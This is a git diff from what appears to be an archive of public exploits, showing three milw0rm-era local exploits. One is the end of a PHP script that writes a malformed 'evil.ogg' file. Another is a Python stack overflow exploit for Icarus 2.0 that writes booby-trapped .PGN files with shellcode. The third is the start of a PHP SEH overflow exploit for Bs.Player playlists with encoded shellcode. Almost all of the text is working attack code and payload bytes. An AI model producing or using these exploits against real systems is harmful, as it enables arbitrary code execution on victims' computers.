+"\x00\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xca\x40\xa1\x21".
+"\x2b\x01\x80\x28\x00\x00\x87\xa2\x58\x16\x70\x1c\xcb\x02\x8e\x63".
+"\x59\x40\x92\x2c\x0b\x60\x59\x00\x4d\x03\x78\x1a\x40\x14\x01\x80".
+"\x00\x00\x80\x02\x07\x00\x80\x00\x1b\x34\x25\x16\x07\x28\x34\x64".
+"\x25\x00\x10\x05\x00\xe0\x70\x14\xcb\xd2\x34\x51\xe4\x38\x96\xa5".
+"\x69\xa2\xc8\x71\x2c\x4b\xd3\x44\x91\x65\x69\x9a\xa6\x89\x22\x34".
+"\x4b\xd3\x44\x11\x9e\xe7\x79\xa6\x09\xcf\xf3\x3c\xd3\x84\x28\x8a".
+"\xa2\x69\x02\x51\x34\x4d\x01\x00\x00\x05\x0e\x00\x00\x01\x36\x68".
+"\x4a\x2c\x0e\x50\x68\xc8\x4a\x00\x20\x24\x00\xc0\xe1\x38\x96\xe5".
+"\x79\xa2\x28\x8a\xa6\x69\x9a\xaa\xca\x71\x2c\xcb\xf3\x44\x51\x14".
+"\x4d\x53\x55\x5d\x97\xe3\x58\x96\xe7\x89\xa2\x28\x9a\xa6\xaa\xba".
+"\x2e\xcb\xd2\x34\xcf\x13\x45\x51\x34\x4d\x55\x75\x5d\x68\x9a\xe7".
+"\x89\xa2\x28\x9a\xa6\xaa\xba\x2e\x34\x4d\x14\x4d\xd3\x34\x55\x55".
+"\x55\x5d\x17\x9a\xe6\x89\xa6\x69\x9a\xaa\xaa\xaa\xae\x0b\xcf\x13".
+"\x45\xd3\x34\x4d\x55\x75\x5d\xd7\x05\xa2\x68\x9a\xa6\xa9\xaa\xae".
+"\xeb\xba\x40\x14\x4d\xd3\x34\x55\xd5\x75\x5d\x17\x88\xa2\x68\x9a".
+"\xa6\xaa\xba\xae\xeb\x02\xd3\x34\x4d\x55\x55\x5d\xd7\x95\x65\x80".
+"\x69\xaa\xaa\xaa\xba\xae\x2c\x03\x54\x55\x55\x5d\xd7\x95\x65\x19".
+"\xa0\xaa\xaa\xea\xba\xae\x2b\xcb\x00\xd7\x75\x5d\xd9\x95\x65\x59".
+"\x06\xe0\xba\xae\x2b\xcb\xb2\x2c\x00\x00\xe0\xc0\x01\x00\x20\xc0".
+"\x08\x3a\xc9\xa8\xb2\x08\x1b\x4d\xb8\xf0\x00\x14\x1a\xb2\x22\x00".
+"\x88\x02\x00\x00\x8c\x61\x4a\x31\xa5\x0c\x63\x12\x42\x0a\xa1\x61".
+"\x4c\x42\x48\x21\x64\x52\x52\x2a\x29\xa5\x0a\x42\x2a\x25\x95\x52".
+"\x41\x48\xa5\xa4\x52\x32\x4a\x2d\xa5\x96\x52\x05\x21\x95\x92\x4a".
+"\xa9\x20\xa4\x52\x52\x29\x05\x00\x80\x1d\x38\x00\x80\x1d\x58\x08".
+"\x85\x86\xac\x04\x00\xf2\x00\x00\x08\x63\x94\x62\xcc\x39\xe7\x24".
+"\x42\x4a\x31\xe6\x9c\x73\x12\x21\xa5\x18\x73\xce\x39\xa9\x14\x63".
+"\xce\x39\xe7\x9c\x94\x92\x31\xe7\x9c\x73\x4e\x4a\xc9\x98\x73\xce".
+"\x39\x27\xa5\x64\xcc\x39\xe7\x9c\x93\x52\x3a\xe7\x9c\x73\x0e\x4a".
+"\x29\xa5\x74\xce\x39\xe7\xa4\x94\x52\x42\xe8\x9c\x73\x52\x4a\x29".
+"\x9d\x73\xce\x39\x01\x00\x40\x05\x0e\x00\x00\x01\x36\x8a\x6c\x4e".
+"\x30\x12\x54\x68\xc8\x4a\x00\x20\x15\x00\xc0\xe0\x38\x96\xa5\x69".
+"\x9e\x27\x8a\xa6\x69\x49\x92\xa6\x79\x9e\x27\x9a\xa6\x69\x6a\x92".
+"\xa4\x69\x9e\x27\x8a\xa6\x69\x9a\x3c\xcf\xf3\x44\x51\x14\x4d\x53".
+"\x55\x79\x9e\xe7\x89\xa2\x28\x9a\xa6\xaa\x72\x5d\x51\x14\x4d\xd3".
+"\x34\x4d\x55\x25\xcb\xa2\x28\x8a\xa6\xa9\xaa\xaa\x0a\xd3\x34\x4d".
+"\xd3\x54\x55\x55\x85\x69\x9a\xa6\x69\xaa\xaa\xeb\xc2\xb6\x55\x55".
+"\x55\x5d\xd7\x75\x61\xdb\xaa\xaa\xaa\xae\xeb\xba\xc0\x75\x5d\xd7".
+"\x75\x65\x19\xb8\xae\xeb\xba\xae\x2c\x0b\x00\x00\x4f\x70\x00\x00".
+"\x2a\xb0\x61\x75\x84\x93\xa2\xb1\xc0\x42\x43\x56\x02\x00\x19\x00".
+"\x00\x84\x31\x08\x29\x84\x10\x52\x06\x21\xa4\x10\x42\x48\x29\x85".
+"\x90\x00\x00\x80\x01\x07\x00\x80\x00\x13\xca\x40\xa1\x21\x2b\x01".
+"\x80\x70\x00\x00\x80\x10\x8c\x31\xc6\x18\x63\x8c\x31\x36\x8c\x61".
+"\x8c\x31\xc6\x18\x63\x8c\x31\x71\x0a\x63\x8c\x31\xc6\x18\x63\x8c".
+"\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31".
+"\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6".
+"\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18".
+"\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63".
+"\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c".
+"\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31".
+"\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\xd8\x5a\x6b\xad\xb5".
+"\x56\x00\x18\xce\x85\x03\x40\x59\x84\x8d\x33\xac\x24\x9d\x15\x8e".
+"\x06\x17\x1a\xb2\x12\x00\x08\x09\x00\x00\x8c\x41\x88\x31\xe8\x24".
+"\x94\x92\x4a\x4a\x15\x42\x8c\x39\x28\x25\x95\x96\x5a\x8a\xad\x42".
+"\x88\x31\x08\xa5\xa4\xd4\x5a\x6c\x31\x16\xcf\x39\x07\xa1\xa4\x94".
+"\x5a\x8a\x29\xb6\xe2\x39\xe7\xa4\xa4\xd4\x5a\x8c\x31\xc6\x5a\x5c".
+"\x0b\x21\xa5\x94\x5a\x8b\x2d\xb6\x18\x9b\x6c\x21\xa4\x94\x52\x6b".
+"\x31\xc6\x5a\x63\x33\x4a\xb5\x94\x5a\x8b\x31\xc6\x18\x6b\x2c\x4a".
+"\xb9\x94\x52\x6b\xb1\xc5\x18\x6b\x8d\x45\x28\x9b\x5b\x6b\x31\xc6".
+"\x5a\x6b\xad\x35\x29\xe5\x73\x4b\xb1\xd5\x5a\x63\xac\xb5\x26\xa3".
+"\x8c\x92\x31\xc6\x5a\x6b\xac\xb5\xd6\x22\x94\x52\x32\xc6\x14\x53".
+"\xac\xb5\xd6\x9a\x84\x30\xc6\xf7\x18\x63\xac\x31\xe7\x5a\x93\x12".
+"\xc2\xf8\x1e\x53\x2d\xb1\xd5\x5a\x6b\x52\x4a\x29\x23\x64\x8d\xa9".
+"\xc6\x5a\x73\x4e\x4a\x09\x65\x8c\x8d\x2d\xd5\x94\x73\xce\x05\x00".
+"\x40\x3d\x38\x00\x40\x25\x18\x41\x27\x19\x55\x16\x61\xa3\x09\x17".
+"\x1e\x80\x42\x43\x56\x02\x00\xb9\x01\x00\x08\x42\x4a\x31\xc6\x98".
+"\x73\xce\x39\xe7\x9c\x73\x0e\x52\xa4\x18\x73\xcc\x39\xe7\x20\x84".
+"\x10\x42\x08\x21\xa4\x08\x31\xc6\x98\x73\xce\x41\x08\x21\x84\x10".
+"\x42\x48\x19\x63\xcc\x39\xe7\x20\x84\x10\x42\x08\xa1\x84\x92\x52".
+"\xca\x98\x73\xce\x41\x08\x21\x84\x52\x4a\x29\x25\xa5\xd4\x39\xe7".
+"\x20\x84\x10\x42\x28\xa5\x94\x52\x4a\x4a\xa9\x73\xce\x41\x08\x21".
+"\x84\x52\x4a\x29\xa5\x94\x94\x52\x08\x21\x84\x10\x42\x08\xa5\x94".
+"\x52\x4a\x29\x29\xa5\x94\x42\x08\x21\x84\x12\x4a\x29\xa5\x94\x52".
+"\x52\x4a\x29\x85\x10\x42\x08\xa5\x94\x52\x4a\x29\xa5\xa4\x94\x52".
+"\x0a\x21\x84\x10\x4a\x29\xa5\x94\x52\x4a\x49\x29\xa5\x14\x42\x09".
+"\xa5\x94\x52\x4a\x29\xa5\x94\x92\x52\x4a\x29\xa5\x10\x4a\x29\xa5".
+"\x94\x52\x4a\x29\x25\xa5\x94\x52\x4a\xa5\x94\x52\x4a\x29\xa5\x94".
+"\x52\x4a\x4a\x29\xa5\x94\x4a\x29\xa5\x94\x52\x4a\x29\xa5\x94\x94".
+"\x52\x4a\x29\x95\x52\x4a\x29\xa5\x94\x52\x4a\x29\x29\xa5\x94\x52".
+"\x4a\xa9\x94\x52\x4a\x29\xa5\x94\x52\x52\x4a\x29\xa5\x94\x52\x29".
+"\xa5\x94\x52\x4a\x29\xa5\xa4\x94\x52\x4a\x29\xa5\x52\x4a\x29\xa5".
+"\x94\x52\x4a\x49\x29\xa5\x94\x52\x4a\xa5\x94\x52\x4a\x29\xa5\x94".
+"\x92\x52\x4a\x29\xa5\x94\x52\x2a\xa5\x94\x52\x4a\x29\xa5\x00\x00".
+"\xa0\x03\x07\x00\x80\x00\x23\x2a\x2d\xc4\x4e\x33\xae\x3c\x02\x47".
+"\x14\x32\x4c\x40\x85\x86\xac\x04\x00\xc8\x00\x00\x10\x07\xb1\xb4".
+"\xd6\x5a\xab\x8c\x72\xca\x49\x49\xad\x43\x46\x1a\xe6\xa0\xa4\xd8".
+"\x49\x07\x21\xb5\x58\x4b\x65\x20\x41\xca\x49\x4a\x9d\x82\x08\x29".
+"\x06\xa9\x85\x8c\x2a\xa5\x98\x93\x96\x42\xcb\x98\x52\x0c\x62\x2b".
+"\x31\x74\x8c\x31\x47\x39\xe5\x54\x42\xc7\x18\x00\x00\x00\x82\x00".
+"\x00\x03\x11\x32\x13\x08\x14\x40\x81\x81\x0c\x00\x38\x40\x48\x90".
+"\x02\x00\x0a\x0b\x0c\x1d\xc3\x45\x40\x40\x2e\x21\xa3\xc0\xa0\x70".
+"\x4c\x38\x27\x9d\x36\x00\x00\x41\x88";
+
+function crcOgg (&$_x) 			
+	{
+	$crc=0;
+	$polynom=0x04C11DB7; //polynomial generator
+	for ($i=0; $i<strlen($_x); $i++)
+		{
+		$c = ord($_x[$i]);
+		for ($j=0; $j<8; $j++)
+			{
+			$bit=0;
+			if ($crc&0x80000000) $bit=1;
+			if ($c&0x80) $bit^=1;
+			$c<<=1;	$crc<<=1;
+			if ($bit) $crc^=$polynom;
+			}
+		}
+	$_x[22]=chr($crc&0xFF);       $_x[23]=chr(($crc>>8)&0xFF);
+      $_x[24]=chr(($crc>>16)&0xFF); $_x[25]=chr(($crc>>24)&0xFF);
+	}
+
+crcOgg($_frgmnt2);
+
+$_frgmnt3="\x4f\x67\x67\x53\x00\x01\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x66\x07\x00\x00\x02\x00\x00\x00\x6a".
+"\xa0\x3f\xb6\x01\x91\xcc\x10\x89\x88\xc5\x20\x31\xa1\x1a\x28\x2a".
+"\xa6\x03\x80\xc5\x05\x86\x7c\x00\xc8\xd0\xd8\x48\xbb\xb8\x80\x2e".
+"\x03\x5c\xd0\xc5\x5d\x07\x42\x08\x42\x10\x82\x58\x1c\x40\x01\x09".
+"\x38\x38\xe1\x86\x27\xde\xf0\x84\x1b\x9c\xa0\x53\x54\xea\x40\x00".
+"\x00\x00\x00\x00\x1e\x00\xe0\x01\x00\x20\xd9\x00\x22\x22\xa2\x99".
+"\xe3\xe8\xf0\xf8\x00\x09\x11\x19\x21\x29\x31\x39\x41\x11\x00\x00".
+"\x00\x00\x00\x3b\x00\xf8\x00\x00\x48\x52\x80\x88\x88\x68\xe6\x38".
+"\x3a\x3c\x3e\x40\x42\x44\x46\x48\x4a\x4c\x4e\x50\x02\x00\x00\x01".
+"\x04\x00\x00\x00\x00\x40\x00\x01\x08\x08\x08\x00\x00\x00\x00\x00".
+"\x04\x00\x00\x00\x08\x08\x4f\x67\x67\x53\x00\x04\x61\x18\x00\x00".
+"\x00\x00\x00\x00\x66\x07\x00\x00\x03\x00\x00\x00\xa5\xbe\xcf\x36".
+"\x09\x2c\x86\x63\x01\x01\x01\xfc\xff\x17\xd4\x1c\xf7\xd1\x45\xd0".
+"\xfb\xcf\xce\x6b\x8e\xfb\xe8\x22\xe8\xfd\x67\xe7\x64\x90\x02\x19".
+"\xc6\x08\x00\xe2\x46\x62\x05\x6b\x7f\xef\xb3\xd8\xfd\xfb\xef\xac".
+"\xb4\x92\xc0\xef\x5f\x05\xda\x65\xfc\xf7\x48\x5f\xa4\x80\x51\x33".
+"\x45\x8b\xa2\xa2\xcb\xf8\xef\x91\xbe\x48\x01\xa3\x66\x8a\x16\x45".
+"\x05\x88\x64\x66\xa7\x33\x49\x34\x00\x00\x24\x90\x02\x10\x38\x15".
+"\x20\x4c\x00\x24\x00\x00\x00\xd0\x0a\xaa\xd1\x50\x55\x4c\xd4\xd2".
+"\x26\xab\x6a\x9a\x98\x34\xfe\x34\xba\xbd\x52\x1d\xc0\x80\x78\xc6".
+"\xa2\x0c\x9d\xe4\x10\x40\x11\x35\xac\x61\xa3\x29\x50\xa4\x90\x08".
+"\xd2\x8a\x76\x50\x7f\x1a\x5d\x2b\x55\x48\x00\x94\x52\x4a\x59\x0a".
+"\x30\x62\x84\xd2\x96\x07\xc0\x18\xb0\x80\x62\x8d\xb7\xa0\x01\xc1".
+"\x5a\x23\x80\x01\x00\x00\x9d\x00\x00\x00\x80\x00\xde\x65\xfc\xef".
+"\x28\x5f\x4a\x81\xb1\xc9\x84\xe8\x32\xfe\x77\x94\x2f\xa5\xc0\xd8".
+"\x64\x42\x80\x80\x24\x60\x31\x66\x22\x9d\x0a\x00\x20\x20\x01\x06".
+"\x00\x00\x00\x80\x2f\x36\xb7\x2a\x7c\x65\xb2\xde\xba\x95\xb7\x4b".
+"\x06\x72\xfe\xee\x5c\x00\xbe\x3e\xb3\xb9\x75\xab\x02\xf0\x06\x38".
+"\x51\x51\x40\x2c\xad\xd9\x68\x05\xab\x36\x58\xd7\xa8\x02\x62\xb1".
+"\x18\x80\xfb\x9c\xf9\x79\x73\xab\x02\x5b\xb7\x7e\xf8\xfc\x19\x0e".
+"\x0e\x0e\xbe\x65\xfc\xf7\x48\x6f\x8c\x01\x0e\x90\x35\xdc\x7c\x8f".
+"\x77\xdc\xc0\x34\xcc\x1c\x45\x29\x6a\x3e\xe8\x99\x51\xe2\xa8\x20".
+"\x54\x90\x10\xe1\x24\x00\x00\x00\x00\x80\xfa\x30\x0c\x45\x44\x44".
+"\xa4\x33\xcb\xb2\x52\xa9\x68\xb5\xda\xd5\x4a\x55\x55\x55\x5d\x96".
+"\x65\xb1\xfd\xef\xbf\xff\x02\x5c\xc6\x86\x61\xb8\x7b\x79\x09\xac".
+"\xa2\xaa\xaa\xaa\x4f\x18\x99\x29\x49\x52\xb4\x2c\xcb\xb2\x2c\xcb".
+"\xb2\x2c\xcb\xb2\x2c\xdd\x4d\xd9\xa1\xaa\xae\x56\xab\xb5\x6b\xd7".
+"\x6a\x57\xab\xd5\x6a\xb5\x5a\xd6\x75\xb5\x67\x06\x80\xcc\x0c\x0c".
+"\xc3\x30\x0c\xc3\x70\xa5\x95\x56\x5a\xa9\x01\xa0\xaa\xec\x38\x8e".
+"\xe3\x52\xad\x54\x2a\x95\x4a\xa5\x52\xa9\xa8\xaa\xaa\x2e\x8b\x67".
+"\x88\x90\xa2\x28\x14\xbd\x5e\xaf\xd7\xeb\xf5\x8a\xa2\x14\x85\x88".
+"\x88\x00\xac\xad\xad\xaa\xaa\xaa\x7f\xff\xfd\xf7\xdf\xaa\xaa\xaa".
+"\x4f\x46\x78\xde\xdc\xdc\xdc\xdc\xa4\x14\x3a\x00\x00\x78\xc5\x55".
+"\x55\x55\x55\x55\x55\x95\x87\xfa\xc0\x30\x0c\xeb\x00\x46\x7d\x18".
+"\x86\x61\x18\x86\x97\xbc\xcf\xcf\xcf\xcf\xcf\x4f\x4f\x7d\x7d\x7d".
+"\x7d\x7d\x3d\x80\x5d\x55\xf7\x7d\xdf\xb7\x6d\xff\xab\x00\xbe\x65".
+"\xfc\xf7\x90\x6f\xac\x81\x35\x24\xeb\xa5\x6f\xcb\xf8\xdf\x2e\xdf".
+"\x60\xe0\x40\x46\xc2\xb8\x34\xbd\x5e\xaf\xd7\xeb\xad\x61\xb3\x3a".
+"\x83\xd8\xa5\x03\xe6\x18\x98\x04\x00\x00\x00\x60\xb1\xb5\xb1\xb7".
+"\x77\xb4\x1a\x55\x3a\x1e\x4d\x4e\x35\xcc\x00\x80\x58\x2c\x56\x54".
+"\x45\xbb\x6f\x54\xf6\x48\xb6\x99\x0f\xf9\x90\x0f\xb9\xca\x20\x6b".
+"\x0d\xc2\x20\x0c\xc2\x20\x0c\xc2\x20\x0c\xc2\x20\x0c\xc2\x20\x8c".
+"\xe2\x28\x8e\x2c\x6f\x6e\x6e\x6e\x1a\xd6\xe6\xe6\xe6\xe6\x66\x59".
+"\x96\xa5\xd6\xc5\xb2\x2c\xcb\xb2\x2c\x16\x8b\xaa\xa8\x8a\xaa\xa8".
+"\x7a\x6d\x55\xad\xaa\x8a\x5a\x2f\xe2\x1e\x80\x0c\xcb\xb2\xbc\x84".
+"\x41\x18\x84\x41\x18\x84\x41\x18\x84\x41\x18\xac\xb2\x2c\x0b\x58".
+"\x65\x59\x96\x65\x59\x96\x37\x0e\x32\x52\x5c\x94\x45\xa9\x54\xf4".
+"\x15\x8d\x6e\x5d\xba\x75\xe9\xd4\xa1\x53\x87\xce\x35\x6b\x35\x5a".
+"\xcd\x4a\x51\x95\x55\x96\x1b\x00\x00\x58\x9b\x00\xc0\x7a\x6b\xce".
+"\xf9\xf6\xf6\xf6\xf6\x36\x0c\x2c\x0b\x80\x92\xe5\xcf\x9f\x3f\x7f".
+"\xfe\xfc\xf9\xb3\x0b\x00\x23\xcb\x8a\x83\x30\x08\x83\x30\x08\x17".
+"\xcb\xb2\x2c\x2b\xba\xf2\x00\x00\xd4\xca\xb2\x94\x65\x59\xd6\xba".
+"\xac\xcb\xba\xac\x8b\x65\x59\xd3\x03\x00\xbc\x3f\x7f\xfe\xfc\xf9".
+"\xf3\xe7\xcf\x00\x00";
+$fp=fopen("evil.ogg","w+");
+if (!$fp) {die("cannot create evil.ogg...");}
+@fputs($fp,$_frgmnt1.$_frgmnt2.$_frgmnt3);
+@fclose($fp);
+?>
+
+# milw0rm.com [2009-03-18]
diff --git a/platforms/windows/local/8236.py b/platforms/windows/local/8236.py
index adbbd563e..6504e3d83 100755
--- a/platforms/windows/local/8236.py
+++ b/platforms/windows/local/8236.py
@@ -1,64 +1,64 @@
-#usage: exploit.py
-print "********************************************************************"
-print " Icarus 2.0 Local Stack Overflow Exploit\n"
-print " Download: http://www.randomsoftware.com/pub/icarus.exe"
-print " Author : His0k4"
-print " Tested on: Windows XP Pro SP2 Fr\n"
-print " Greetings to:"
-print " All friends & muslims HaCkers(dz)\n"
-print " Tip of the day: Klimontayne fe romayne :D"
-print "********************************************************************\n\n"
-
-					
-payload1 =   "\x41" * 336
-payload1 +=  "\x5D\x38\x82\x7C" # call esp kernel32.dll (sp2)
-payload1 +=  "\x90" * 19 #some nops
-payload1 +=  "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38"
-payload1 +=  "\x4e\xf9\x9f\x83\xeb\xfc\xe2\xf4\xc4\xa6\xbd\x9f\x38\x4e\x72\xda"
-payload1 +=  "\x04\xc5\x85\x9a\x40\x4f\x16\x14\x77\x56\x72\xc0\x18\x4f\x12\xd6"
-payload1 +=  "\xb3\x7a\x72\x9e\xd6\x7f\x39\x06\x94\xca\x39\xeb\x3f\x8f\x33\x92"
-payload1 +=  "\x39\x8c\x12\x6b\x03\x1a\xdd\x9b\x4d\xab\x72\xc0\x1c\x4f\x12\xf9"
-payload1 +=  "\xb3\x42\xb2\x14\x67\x52\xf8\x74\xb3\x52\x72\x9e\xd3\xc7\xa5\xbb"
-payload1 +=  "\x3c\x8d\xc8\x5f\x5c\xc5\xb9\xaf\xbd\x8e\x81\x93\xb3\x0e\xf5\x14"
-payload1 +=  "\x48\x52\x54\x14\x50\x46\x12\x96\xb3\xce\x49\x9f\x38\x4e\x72\xf7"
-payload1 +=  "\x04\x11\xc8\x69\x58\x18\x70\x67\xbb\x8e\x82\xcf\x50\xbe\x73\x9b"
-payload1 +=  "\x67\x26\x61\x61\xb2\x40\xae\x60\xdf\x2d\x98\xf3\x5b\x4e\xf9\x9f"
-junk     =   "\xCC"*7000
-
-
-payload2 =	 "\x5B\x46\x6F\x72\x6D\x61\x74\x20\x22\x4C\x65\x63\x74\x75\x72\x65\x22\x5D"
-payload2 +=  "\x0A\x5B\x54\x69\x74\x6C\x65\x20\x22\x65\x78\x70\x6C\x6F\x69\x74\x22\x5D"
-payload2 +=  "\x0A\x0A"
-payload2 +=  "\x41"*788
-payload2 +=  "\xEB\x06\x90\x90" # jmp +6
-payload2 +=  "\xE9\x10\x37\x01" # universal pop pop ret
-payload2 +=  "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38"
-payload2 +=  "\x4e\xf9\x9f\x83\xeb\xfc\xe2\xf4\xc4\xa6\xbd\x9f\x38\x4e\x72\xda"
-payload2 +=  "\x04\xc5\x85\x9a\x40\x4f\x16\x14\x77\x56\x72\xc0\x18\x4f\x12\xd6"
-payload2 +=  "\xb3\x7a\x72\x9e\xd6\x7f\x39\x06\x94\xca\x39\xeb\x3f\x8f\x33\x92"
-payload2 +=  "\x39\x8c\x12\x6b\x03\x1a\xdd\x9b\x4d\xab\x72\xc0\x1c\x4f\x12\xf9"
-payload2 +=  "\xb3\x42\xb2\x14\x67\x52\xf8\x74\xb3\x52\x72\x9e\xd3\xc7\xa5\xbb"
-payload2 +=  "\x3c\x8d\xc8\x5f\x5c\xc5\xb9\xaf\xbd\x8e\x81\x93\xb3\x0e\xf5\x14"
-payload2 +=  "\x48\x52\x54\x14\x50\x46\x12\x96\xb3\xce\x49\x9f\x38\x4e\x72\xf7"
-payload2 +=  "\x04\x11\xc8\x69\x58\x18\x70\x67\xbb\x8e\x82\xcf\x50\xbe\x73\x9b"
-payload2 +=  "\x67\x26\x61\x61\xb2\x40\xae\x60\xdf\x2d\x98\xf3\x5b\x4e\xf9\x9f"
-payload2 +=  "\xCC"*7000
-
-
-
-try:
-    out_file = open("exploit_eip.PGN",'w')
-    out_file.write(payload1+junk)
-    out_file.close()
-    print "Eip exploit File Created!\nNow you can run this file directly\n"
-except:
-    print "Error"
-try:
-    out_file = open("exploit_seh.PGN",'w')
-    out_file.write(payload2)
-    out_file.close()
-    print "Seh exploit File Created!\nOpen Icarus then game>load and chose exploit_seh.PGN\n"
-except:
-    print "Error"	
-
-# milw0rm.com [2009-03-18]
+#usage: exploit.py
+print "********************************************************************"
+print " Icarus 2.0 Local Stack Overflow Exploit\n"
+print " Download: http://www.randomsoftware.com/pub/icarus.exe"
+print " Author : His0k4"
+print " Tested on: Windows XP Pro SP2 Fr\n"
+print " Greetings to:"
+print " All friends & muslims HaCkers(dz)\n"
+print " Tip of the day: Klimontayne fe romayne :D"
+print "********************************************************************\n\n"
+
+					
+payload1 =   "\x41" * 336
+payload1 +=  "\x5D\x38\x82\x7C" # call esp kernel32.dll (sp2)
+payload1 +=  "\x90" * 19 #some nops
+payload1 +=  "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38"
+payload1 +=  "\x4e\xf9\x9f\x83\xeb\xfc\xe2\xf4\xc4\xa6\xbd\x9f\x38\x4e\x72\xda"
+payload1 +=  "\x04\xc5\x85\x9a\x40\x4f\x16\x14\x77\x56\x72\xc0\x18\x4f\x12\xd6"
+payload1 +=  "\xb3\x7a\x72\x9e\xd6\x7f\x39\x06\x94\xca\x39\xeb\x3f\x8f\x33\x92"
+payload1 +=  "\x39\x8c\x12\x6b\x03\x1a\xdd\x9b\x4d\xab\x72\xc0\x1c\x4f\x12\xf9"
+payload1 +=  "\xb3\x42\xb2\x14\x67\x52\xf8\x74\xb3\x52\x72\x9e\xd3\xc7\xa5\xbb"
+payload1 +=  "\x3c\x8d\xc8\x5f\x5c\xc5\xb9\xaf\xbd\x8e\x81\x93\xb3\x0e\xf5\x14"
+payload1 +=  "\x48\x52\x54\x14\x50\x46\x12\x96\xb3\xce\x49\x9f\x38\x4e\x72\xf7"
+payload1 +=  "\x04\x11\xc8\x69\x58\x18\x70\x67\xbb\x8e\x82\xcf\x50\xbe\x73\x9b"
+payload1 +=  "\x67\x26\x61\x61\xb2\x40\xae\x60\xdf\x2d\x98\xf3\x5b\x4e\xf9\x9f"
+junk     =   "\xCC"*7000
+
+
+payload2 =	 "\x5B\x46\x6F\x72\x6D\x61\x74\x20\x22\x4C\x65\x63\x74\x75\x72\x65\x22\x5D"
+payload2 +=  "\x0A\x5B\x54\x69\x74\x6C\x65\x20\x22\x65\x78\x70\x6C\x6F\x69\x74\x22\x5D"
+payload2 +=  "\x0A\x0A"
+payload2 +=  "\x41"*788
+payload2 +=  "\xEB\x06\x90\x90" # jmp +6
+payload2 +=  "\xE9\x10\x37\x01" # universal pop pop ret
+payload2 +=  "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38"
+payload2 +=  "\x4e\xf9\x9f\x83\xeb\xfc\xe2\xf4\xc4\xa6\xbd\x9f\x38\x4e\x72\xda"
+payload2 +=  "\x04\xc5\x85\x9a\x40\x4f\x16\x14\x77\x56\x72\xc0\x18\x4f\x12\xd6"
+payload2 +=  "\xb3\x7a\x72\x9e\xd6\x7f\x39\x06\x94\xca\x39\xeb\x3f\x8f\x33\x92"
+payload2 +=  "\x39\x8c\x12\x6b\x03\x1a\xdd\x9b\x4d\xab\x72\xc0\x1c\x4f\x12\xf9"
+payload2 +=  "\xb3\x42\xb2\x14\x67\x52\xf8\x74\xb3\x52\x72\x9e\xd3\xc7\xa5\xbb"
+payload2 +=  "\x3c\x8d\xc8\x5f\x5c\xc5\xb9\xaf\xbd\x8e\x81\x93\xb3\x0e\xf5\x14"
+payload2 +=  "\x48\x52\x54\x14\x50\x46\x12\x96\xb3\xce\x49\x9f\x38\x4e\x72\xf7"
+payload2 +=  "\x04\x11\xc8\x69\x58\x18\x70\x67\xbb\x8e\x82\xcf\x50\xbe\x73\x9b"
+payload2 +=  "\x67\x26\x61\x61\xb2\x40\xae\x60\xdf\x2d\x98\xf3\x5b\x4e\xf9\x9f"
+payload2 +=  "\xCC"*7000
+
+
+
+try:
+    out_file = open("exploit_eip.PGN",'w')
+    out_file.write(payload1+junk)
+    out_file.close()
+    print "Eip exploit File Created!\nNow you can run this file directly\n"
+except:
+    print "Error"
+try:
+    out_file = open("exploit_seh.PGN",'w')
+    out_file.write(payload2)
+    out_file.close()
+    print "Seh exploit File Created!\nOpen Icarus then game>load and chose exploit_seh.PGN\n"
+except:
+    print "Error"	
+
+# milw0rm.com [2009-03-18]
diff --git a/platforms/windows/local/8249.php b/platforms/windows/local/8249.php
index fc8e868ba..1496dc400 100755
--- a/platforms/windows/local/8249.php
+++ b/platforms/windows/local/8249.php
@@ -1,80 +1,80 @@
-<?php
-/*
-Bs.Player <= 2.34 Build 980 (.bsl) local buffer overflow 0day exploit (seh)
-by Nine:Situations:Group::pyrokinesis
-
-Overlong hostnames in bsplayer playlist files causes eax and seh handlers to be
-overwritten. Cannot reliably debug with olly because of code compression, just
-used faultmon/memdump/msfpescan and I choosed the easy/universal way with seh.
-There are some pop ret addresses in common among the vulnerable versions...
-
-Well it says local but I consider it a remote one because .bsl files are
-associated to the program
-Tested and working against:
-
-...
-v2.32 Build 975 Free
-v2.34 Build 980 PRO
-win xp pro sp2 / sp3
-win 2k3 sp1
-
-not vulnerable:
-v2.35 Build 985 PRO
-V2.36 Build 990 Free/Pro
-
-
-*/
-$buffer=
-"\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x23\x45\x58\x54\x49\x4e\x46".
-"\x3a\x30\x2c\x41\x41\x41\x41\x0d\x0a\x68\x74\x74\x70\x3a\x2f\x2f".
-"\x52\x61\x77\x2d\x48\x69\x67\x68\x2e";
-
-$nop1=str_repeat("\x90",384);
-$eax_again="BBBB";
-$nop2=str_repeat("\x90",12);
-$eax="CCCC";
-$nop3=str_repeat("\x90",8);
-$jnk=$nop1.$eax_again.$nop2.$eax.$nop3;
-
-$jmp="\xeb\x08\x90\x90";
-
-$seh="\xb1\xad\x41\x00"; //0x0041adb1   pop pop ret bsplayer.exe
-
-$nop4=str_repeat("\x90",100);
-
-// win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
-$scode=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
-"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x47".
-"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x57\x32\x42\x42\x42\x32".
